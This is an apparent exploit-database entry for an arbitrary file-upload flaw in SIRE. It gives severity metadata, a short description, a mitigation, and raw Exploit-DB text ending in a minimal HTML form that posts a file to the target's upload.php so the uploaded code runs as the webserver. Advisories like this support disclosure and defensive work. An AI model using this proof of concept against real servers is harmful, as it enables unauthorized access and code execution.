header-logo
Suggest Exploit
vendor:
SIRE
by:
SecurityFocus
8.8
CVSS
HIGH
Arbitrary File-Upload Vulnerability
264
CWE
Product Name: SIRE
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2004

SIRE Arbitrary File-Upload Vulnerability

SIRE is prone to an arbitrary file-upload vulnerability, which allows an attacker to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Restrict access to the upload.php file and ensure that the webserver process does not have write access to the web root.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17431/info

SIRE is prone to an arbitrary file-upload vulnerability. 

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

<form enctype="multipart/form-data" method="post" action="http://Trajet/upload.php?"> Download File<br>

<input name="fichier" type="file" size="48"><br>
<input type="submit" name="upload" value="uploader"><form>